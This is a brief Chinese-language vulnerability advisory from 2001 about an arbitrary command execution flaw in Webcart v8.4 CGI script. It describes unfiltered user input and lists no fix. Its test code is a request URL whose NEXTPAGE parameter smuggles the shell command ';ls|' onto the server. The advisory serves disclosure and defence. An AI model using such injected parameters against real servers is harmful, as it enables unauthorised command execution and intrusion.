Webcart存在任意命令可执行漏洞发布时间:2001-10-20 更新时间:2001-10-20 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Webcart v.8.4详细描述 Webcart是由Mountain Network systems公司开发的脚本程序。 其中存在一个漏洞,没有很好的过滤用户输入可以导致在web服务器上执行任意命令。 测试代码 http://www.server.com/cgi-bin/webcart/webcart.cgi? CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD 解决方案 尚无 相关信息 |
